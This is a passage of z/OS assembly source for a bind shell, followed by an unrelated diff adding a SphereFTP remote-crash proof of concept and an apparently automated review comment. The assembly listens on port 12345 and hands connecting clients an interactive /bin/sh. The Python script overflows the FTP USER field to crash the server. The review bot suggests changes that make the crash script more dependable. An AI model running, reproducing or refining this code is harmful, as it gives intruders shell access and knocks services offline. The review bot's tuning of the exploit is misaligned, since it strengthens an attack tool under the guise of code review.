LA 2,F_DUPFD2 # gonna do a dup2
L 5,CFDW # child write fd
LGFI 6,2 # std error
BRC 15,LFCNTL # call dupe2
@PRC5 LARL 14,@PRC6
LA 2,F_CLOSFD
L 5,PFDR # load R5 with pfdr
L 6,PFDR # load R5 with pfdr
BRC 15,LFCNTL # call close
@PRC6 LARL 14,@PRC7
LA 2,F_CLOSFD
L 5,CFDW # load R5 with cfdw
L 6,CFDW # load R5 with cfdw
BRC 15,LFCNTL # call close
@PRC7 BRAS 0,LEXEC
***********************************************************************
* *
* BP1EXC (EXEC) execute shell '/bin/sh' *
* *
***********************************************************************
LEXEC L 15,BEXC # load func addr to 15
CALL (15),(EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL, x
EXENVC,EXENVLL,EXENVL, x
EXITRA,EXITPLA, x
RTN_VAL,RTN_COD,RSN_COD),VL
BRAS 0,GOODEX # exit child proc after exec
****************************************************
* prepare the parent process to speak with child *
* order of things to prep parent pid *
* 0) close parent fd read *
* 1) close child fd write *
* 2) socket,bind,accept,listen,read & write *
* 3) set client socked and child fd write *
* to non_blocking *
****************************************************
@PREPPAR LARL 14,@PRP1
LA 2,F_CLOSFD
L 5,PFDR # load R5 with pfdr
L 6,PFDR # load R5 with pfdr
BRC 15,LFCNTL # call close
@PRP1 LARL 14,LSOCK
LA 2,F_CLOSFD
L 5,CFDW # load R5 with cfdw
L 6,CFDW # load R5 with cfdw
BRC 15,LFCNTL # call close
***********************************************************************
* *
* BPX1SOC set up socket - inline *
* *
***********************************************************************
LSOCK L 15,BSOC # load func addr to 15
CALL (15),(DOM,TYPE,PROTO,DIM,SRVFD, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,2
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPC1BND (bind) bind to socket - inline *
* *
***********************************************************************
LBIND L 15,BBND # load func addr to 15
LA 5,SRVSKT # addr of our socket
USING SOCKADDR,5 # layout sockaddr over R5
XC SOCKADDR(16),SOCKADDR # zero sock addr struct
MVI SOCK_FAMILY,AF_INET # family inet
MVI SOCK_LEN,SOCK#LEN # len of socket
MVC SOCK_SIN_PORT,LISTSOCK # list on PORT 12345
MVC SOCK_SIN_ADDR,LISTADDR # listen on 0.0.0.0
DROP 5
CALL (15),(SRVFD,SOCKLEN,SRVSKT, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,3
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPX1LSN (listen) listen on created socket - inline *
* *
***********************************************************************
LLIST L 15,BLSN # load func addr to 15
CALL (15),(SRVFD,BACKLOG, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,4
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPX1ACP (accept) - accept conn from socket - inline *
* *
***********************************************************************
LACPT L 15,BACP # load func addr to 15
LA 5,CLISKT # addr of our socket address
USING SOCKADDR,5 # set up addressing for sock struct
XC SOCKADDR(8),SOCKADDR #zero sock addr struct
MVI SOCK_FAMILY,AF_INET
MVI SOCK_LEN,(SOCK#LEN+SOCK_SIN#LEN)
DROP 5
CALL (15),(SRVFD,CLILEN,CLISKT, x
CLIFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,5
L 6,CLIFD
CIB 6,-1,8,EXITP # R6 = -1? Time to exit
****************************************************
* Set clifd and child fd read to non_blocking *
****************************************************
@SNB1 LARL 14,@SNB2
LA 2,F_GETFL # get file status flags
L 5,CLIFD # client sock fd
XR 6,6 # for getfd, arg is 0
BRC 15,LFCNTL # call dupe2
@TFLAG DC F'0'
@SNB2 ST 7,@TFLAG # R7 will have our flags
LA 5,O_NONBLOCK # add non-blocking flag
OR 7,5 # or to add the flag to R7
LARL 14,@SNB3
LA 2,F_SETFL # set file status flags
L 5,CLIFD # client sock fd
LR 6,7 # put new flags in R6
BRC 15,LFCNTL # call dupe2
@SNB3 LARL 14,@SNB4
LA 2,F_GETFL # get file status flags
L 5,CFDR # child fd read
XR 6,6 # for getfd, arg is 0
BRC 15,LFCNTL # call dupe2
@SNB4 ST 7,@TFLAG # R7 will have our flags
LA 5,O_NONBLOCK # add non-blocking flag
OR 7,5 # or to add the flag to R7
LARL 14,@READCLI # when we ret, enter main loop
LA 2,F_SETFL # set file status flags
L 5,CFDR # child fd read
LR 6,7 # put new flags in R6
BRC 15,LFCNTL # call dupe2
***********************************************************************
* *
* Main read from client socket looop starts here *
* *
***********************************************************************
@READCLI L 5,CLIFD # read from CLIFD
LA 7,@READCFD # Nothing read, return to here
LARL 14,@A2E1 # Bytes read, return to here
BRC 15,LREAD # Brach to read function
*******************************
* CALL A2E *
* change CLIBUF from *
* ASCII to EBCDIC *
*******************************
@A2E1 LARL 14,@CCW1 # load return area in r14
BRC 15,CONVAE # call e2a func
@CCW1 LARL 14,@READCFD # after write, read child fd
L 5,PFDW # write to child process fd
BRC 15,LWRITE # call write function
***********************************************************************
* *
* Read from child fd loop starts here *
* *
***********************************************************************
@READCFD L 5,CFDR # read from child fd
LA 7,@READCLI # nothing read, back to socket read
LARL 14,@E2A1 # Bytes read, return to here
BRC 15,LREAD # Branch to read function
*******************************
* CALL E2A *
* change CLIBUF from *
* EBCIDIC to ASCII *
*******************************
@E2A1 LARL 14,@CCW2 # load return area in r14
BRC 15,CONVEA # call e2a func
@CCW2 LARL 14,@READCFD # loop read child proc fd after write
L 5,CLIFD # write to client socked fd
BRC 15,LWRITE # call write function
********************************************************
* Functions beyond this point, no more inline *
* execution beyond here should occur *
********************************************************
***********************************************************************
* *
* BPX1RED (read) - function *
* R5 has file descriptor to read from *
* R7 has nothing read address *
* R14 has good read return address *
* *
***********************************************************************
LREAD L 15,BRED # load func addr to 15
ST 5,@TRFD # file descriptor we are reading
ST 7,@NRA # no bytes read: return address
ST 14,SAVEAREA # bytes read: return address
XR 1,1 # clear R1
ST 1,BREAD # clear Bytes Read
L 5,CLIBUF # clibuf addr
XC 0(52,5),0(5) # 0 out cli buf
BRAS 0,@CRED # jump to call
@TRFD DC 4XL1'0' # temp var for rd to read
@NRA DC 4XL1'0' # temp var for not read ret addr
@CRED CALL (15),(@TRFD,CLIBUF,ALET,CLIREAD, x
BREAD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
* for non-blocking fd's we have to check *
* both the return val and code to make sure *
* it didn't fail just b/c non-blocking and no *
* data available vs just a read error *
****************************************************
L 14,SAVEAREA # bytes read RA
L 7,@NRA # no bytes read RA
LHI 15,6 # exit code for this function
L 6,BREAD # bytes read (aka rtn val)
CIB 6,0,2,0(14) # bytes read, process them
CIB 6,0,8,0(7) # OK rtn code, on to nobyte read
L 6,RTN_COD # load up return code
LA 1,EWOULDBLOCK # load up the non-blocking RTNCOD
LA 2,EAGAIN # load up the other OK nblck RTNCOD
CRB 6,1,8,0(7) # OK rtn code, on to nobyte read
CRB 6,2,8,0(7) # OK rtn code, on to nobyte read
BRAS 0,EXITP # -1 and not due to blocking, exit
***********************************************************************
* *
* BPX1WRT (WRITE) - function *
* R5 has file descriptor to read from *
* *
***********************************************************************
LWRITE L 15,BWRT # load func addr to 15
ST 5,@TWFD # store fd in temp fd
ST 14,SAVEAREA # save return address
BRAS 0,@CWRT # jump to write
@TWFD DC A(*) # temp holder for fd
@CWRT CALL (15),(@TWFD,CLIBUF,ALET,BREAD, x
BWRIT,RTN_COD,RSN_COD),VL
**************************************************************
* chk return code here anything but neg 1 is ok *
* exit if a match (8) *
**************************************************************
L 14,SAVEAREA # restore return address
LHI 15,9 # exit code for this func
L 6,BWRIT # set r6 to rtn val
CIB 6,-1,8,EXITP # exit if R6 = -1
BCR 15,14 # back to return address
***********************************************************************
* *
* BPX1FCT (fcntl) edit file descriptor *
* for dup2 set R2=F_DUPFD2 *
* R5=fd to modify R6=fd to set R5 equal to *
* equivalent to dupe2(R5,R6) *
* for read flags, set R2=F_GETFL *
* R5=fd, R6=0, R7=rtn flags *
* for write flags, set R2=F_SETFL *
* R5=fd, R6=<new flags> R7=0 *
* for close, set R2=F_CLOSFD *
* R5=R6 = fd to close (optionally R5 & R6 can be a range *
* of FDs to close) *
* *
***********************************************************************
LFCNTL L 15,BFCT # load func addr to 15
ST 14,SAVEAREA # save return address
ST 5,@FFD # fd to be duplicated
ST 2,@ACT # action field for BPX1FCT
ST 6,@ARG # r6 should have the biggest fd
BRAS 0,@FCTL
@FFD DC F'0'
@ACT DC F'0'
@ARG DC F'0'
@RETFD DC F'0'
@FCTL CALL (15),(@FFD,@ACT,@ARG,@RETFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,11 # exit code for this func
L 7,@RETFD # set r6 to rtn val
CIB 7,-1,8,EXITP # r6 = -1 exit
L 14,SAVEAREA # reload ret address
BCR 15,14 # return to caller
***********************************************************************
* *
* BPX1PIP (pipe) create pipe - no input *
* returns: R5=read fd R6=write fd *
* *
***********************************************************************
LPIPE L 15,BPIP # load func addr to 15
ST 14,SAVEAREA # save return address
BRAS 0,@PIP
@RFD DC F'0' # read file desc
@WFD DC F'0' # write file desc
@PIP CALL (15),(@RFD,@WFD,RTN_VAL,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,12 # exit code for this func
L 6,BWRIT # set r6 to rtn val
CIB 6,-1,8,EXITP
L 5,@RFD # load R5 with read fd
L 6,@WFD # load R6 with write fd
L 14,SAVEAREA # reload ret address
BCR 15,14 # return to caller
***********************************************************************
* *
* CONVAE - convert CLIBUF ascii to ebcidic *
* function looks up ascii byte and returns ebcdic *
* expects return address in R14 *
* *
***********************************************************************
CONVAE LHI 6,1 # R6 has number 1
L 4,BREAD # num of bytes read
L 1,CLIBUF # address of cli sock input
LOOP1 L 2,A2E # address of a2e buff
SR 2,6 # subtract 1 from R2 addr
LB 3,0(0,1) # Load byte from cli into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 2,3 # add ascii val to a2e buff
LB 3,0(0,2) # load byte from a2e buff into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
STC 3,0(0,1) # store R3 byte back into cli buff
AR 1,6 # increment client buff
SR 4,6 # sub1 from ctr, loop if non-neg
BRC 7,LOOP1 # looop
BCR 15,14 # return to caller
***********************************************************************
* *
* CONVEA - convert CLIBUF ebcidic to ascii *
* function looks up ebcidic byte and returns ascii *
* expects return address in R14 *
* *
***********************************************************************
CONVEA LHI 6,1 # R6 has number 1
L 4,BREAD # num of bytes read
L 1,CLIBUF # address of cli sock input
LOOP2 L 2,E2A # address of e2a buff
SR 2,6 # subtract 1 from R2 addr
LB 3,0(0,1) # Load byte from cli into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 2,3 # add ascii val to e2a buff
LB 3,0(0,2) # load byte from e2a buff into R3
STC 3,0(0,1) # store R3 byte back into cli buff
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 1,6 # increment client buff
SR 4,6 # sub1 from ctr, loop if non-neg
BRC 7,LOOP2 # looop
BCR 15,14 # return to caller
****************************************************
* cleanup & exit *
* preload R15 with exit code *
****************************************************
GOODEX XR 15,15 # zero return code
EXITP ST 15,0(,11)
L 13,4(,11)
LM 14,12,12(13) # restore registers
LARL 5,SAVEAREA
L 15,0(0,5)
BCR 15,14 # branch to caller
**********************
**********************
* *
* Constant Sections *
* *
**********************
**********************
@CONST DS 0F # constants full word boundary
SAVEAREA DC X'00000000'
DC X'00000000'
ALET DC F'0'
O_NONBLOCK EQU X'04' # bit for nonblocking io
EWOULDBLOCK EQU X'44E' # rtncod for nonblk read sock
EAGAIN EQU X'70' # rtncod for nonblk, not thr
*************************
* Function addresses * # pipe variables
*************************
FFUNC DC A(BFRK) # address of first function
NUMFUNC DC F'11' # number of funcs listed below
BFRK DC CL8'BPX1FRK ' # Fork
BEXC DC CL8'BPX1EXC ' # Exec
BSOC DC CL8'BPX1SOC ' # Socket
BBND DC CL8'BPX1BND ' # Bind
BLSN DC CL8'BPX1LSN ' # Listen
BACP DC CL8'BPX1ACP ' # Accept
BRED DC CL8'BPX1RED ' # Read
BWRT DC CL8'BPX1WRT ' # Write
BCLO DC CL8'BPX1CLO ' # Close
BFCT DC CL8'BPX1FCT ' # Fcntl
BPIP DC CL8'BPX1PIP ' # Pipe
*************************
* Socket conn variables * # functions used by pgm
*************************
LISTSOCK DC XL2'3039' # port 12345
LISTADDR DC XL4'00000000' # address 0.0.0.0
BACKLOG DC F'1' # 1 byte backlog
DOM DC A(AF_INET) # AF_INET = 2
TYPE DC A(SOCK#_STREAM) # stream = 1
PROTO DC A(IPPROTO_IP) # ip = 0
DIM DC A(SOCK#DIM_SOCKET) # dim_sock = 1
SRVFD DC A(*) # server FD
SRVSKT DC 16XL1'77' # srv socket struct
SOCKLEN DC A(SOCK#LEN+SOCK_SIN#LEN)
CLILEN DC A(*) # len of client struct
CLISKT DC 16XL1'88' # client socket struct
CLIFD DC A(*) # client fd
************************
* BPX1PIP vars ********* # pipe variables
************************
CFDR DC F'0' # child proc FD read
CFDW DC F'0' # child proc FD write
PFDR DC F'0' # parent proc FD read
PFDW DC F'0' # parent proc FD write
************************
* BPX1FRK vars *********
************************
CPROCN DC F'-1' # child proc #
************************
* BPX1EXC vars *********
************************
EXCMD DC CL7'/bin/sh' # command to exec
EXCMDL DC A(L'EXCMD) # len of cmd to exec
EXARGC DC F'1' # num of arguments
EXARG1 DC CL2'sh' # arg 1 to exec
EXARG1L DC A(L'EXARG1) # len of arg1
EXARGL DC A(EXARG1) # addr of argument list
EXARGLL DC A(EXARG1L) # addr of arg len list
EXENVC DC F'0' # env var count
EXENVL DC F'0' # env var arg list addr
EXENVLL DC F'0' # env var arg len addr
EXITRA DC F'0' # exit routine addr
EXITPLA DC F'0' # exit rout parm list addr
**************************
* Socket read/write vars *
**************************
CLIREAD DC A(L'@CBUF) # one less than buf
CLIBUF DC A(@CBUF) # buff for read cli sock
@CBUF DC 52XL1'22'
BREAD DC F'0' # bytes read
BWRIT DC F'0' # bytes written
*********************
* Return value vars *
*********************
RTN_VAL DC A(*) # return value
RTN_COD DC A(*) # return code
RSN_COD DC A(*) # reason code
***************************
***** end of constants ****
***************************
****************************************************
* ebcidic to ascii lookup *
* read hex(ebcidic char) bytes from beginning of *
* array to get ascii byte *
****************************************************
E2ABUF DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX
1c1d1e1f808182838485171b88898a8b8c0506079091169394959604X
98999a9b14159e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX
e8edeeefecdf21242a293b5e2d2fc2c4c0c1c3c5c7d1a62c255f3e3fX
f8c9cacbc8cdcecfcc603a2340273d22'
DC X'd8616263646566676869abbbf0fdfeb1b06a6b6c6d6e6f707172aaX
bae6b8c6a4b57e737475767778797aa1bfd05bdeaeaca3a5b7a9a7b6X
bcbdbedda8af5db4d77b414243444546474849adf4f6f2f3f57d4a4bX
4c4d4e4f505152b9fbfcf9faff5cf7535455565758595ab2d4d6d2d3X
d530313233343536373839b3dbdcd9da'
DC X'9f'
E2A DC A(E2ABUF)
****************************************************
* ascii to ebcidic lookup *
* read hex(ascii char) bytes from beginning of *
* array to get ebcidic byte *
****************************************************
A2EBUF DC X'010203372d2e2f1605150b0c0d0e0f101112133c3d322618193f27X
1c1d1e1f405a7f7b5b6c507d4d5d5c4e6b604b61f0f1f2f3f4f5f6f7X
f8f97a5e4c7e6e6f7cc1c2c3c4c5c6c7c8c9d1d2d3d4d5d6d7d8d9e2X
e3e4e5e6e7e8e9ade0bd5f6d79818283848586878889919293949596X
979899a2a3a4a5a6a7a8a9c04fd0a107'
DC X'202122232425061728292a2b2c090a1b30311a333435360838393aX
3b04143eff41aa4ab19fb26ab5bbb49a8ab0caafbc908feafabea0b6X
b39dda9b8bb7b8b9ab6465626663679e687471727378757677ac69edX
eeebefecbf80fdfefbfcbaae594445424643479c4854515253585556X
578c49cdcecbcfcce170dddedbdc8d8e'
DC X'df'
A2E DC A(A2EBUF)
BPXYSOCK LIST=YES # MACRO MAP for socket structure
BPXYFCTL LIST=YES # MACRO MAP for fcntl structure
END @SETUP

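--- a/platforms/windows/dos/38072.py
+++ b/platforms/windows/dos/38072.py
@@ -0,0 +1,16 @@
+#!/usr/bin/python
+# Exploit Title: SphereFTP Server v2.0 Remote Crash PoC
+# Date: 2015-09-02
+# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
+# Vendor Homepage: http://www.menasoft.com/blog/?p=32
+# Software Link: http://www.menasoft.com/sphereftp/sphereftp_win32_v20.zip
+# Version: 2.0
+# Tested on: Microsoft Windows XP Professional SP3
+import socket
+target = '192.168.0.166'
+exploit = "A" * 1000
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect((target,21))
+s.send("USER "+exploit+"\r\n")
+s.close()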
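Review bot: The return value of `s.send` on the `USER` line is discarded, so a short write would silently deliver less than the 1000-byte field the header describes; `s.sendall("USER "+exploit+"\r\n")` is the call that writes the whole buffer. No timeout is set before `s.connect`, so a host that does not answer hangs the script indefinitely; `s.settimeout(5)` before the connect bounds that, and the hard-coded `target` literal would be easier to reuse in a lab as a command-line argument. The script never reads a response, so the header cannot tell a reader what outcome to look for; a line such as `# Expected result: <observed server behaviour> -- TODO confirm` next to the "Tested on" line would let defenders map this to the service crash in their logs.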